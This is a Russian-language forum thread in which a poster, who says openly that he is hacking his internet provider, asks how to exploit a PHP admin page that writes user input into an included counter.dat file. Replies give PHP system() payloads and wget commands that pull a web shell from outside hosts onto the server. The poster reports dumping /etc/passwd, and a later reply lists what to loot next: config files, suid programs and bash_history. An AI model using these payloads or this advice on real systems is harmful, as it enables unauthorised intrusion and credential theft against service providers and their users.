Имею 3 файла, admin.php, counter.dat, gor_news.php. Админ пшп выглядит просто - 1 мемо и кнопка. То, что вводиться в мемо пишится в counter.dat. При заходе в gor_news.php загружаеться этот самый коунтер.дат. В админ.пшп можно вставлять пшп код, но код типа <?php system('ls') ?> в канутер.дат уже записываеться, как <?php system(\'ls\') ?> При вводе кода без кавычек получаю листинг файлов. Код типа <?php system($cmd) ?> выдает Warning: system() [function.system]: Cannot execute a blank command in /var/apache2/htdocs/rus/home/counter.dat on line 1 Думаю, проблема вам понятна) Как её можно обойти, и если обойти нельзя, можно ли прямым вводом команд получать листинг предыдущей папки? Выручайте, провайдера взламываю =)
хз чё посоветовать попробуй wget'ом шелл залить <? system(wget http://medved.ru/preved.php /var/apache2/htdocs/rus/home/preved.php) ?>
На вгет получил Parse error: syntax error, unexpected T_STRING in /var/apache2/htdocs/rus/home/counter.dat on line 1 =) Пробовал так: <?php system(' ls '); ?> Глупо, и не получилось =) Напомните плз команды сервера, ls, cd и т.д., просмотр файла и всякое такое, давно не работал забыл уже ))
Так, спасибо тоха, я делал немного подругому) c как переменную объявлял и пшп тупил =) Есть доступ. Какие файлы в ../../../../../ могут пригодиться? =) etc\passwd слил.
Почти в любом шелле есть поиск всех *conf, suid программ и др...загрузи шелл командой wget http://yoursite/shell.php(шеллы тут ). Также можно посмотреть bash_history в домашних каталогах /home/*(они не объязательно могут быть там).
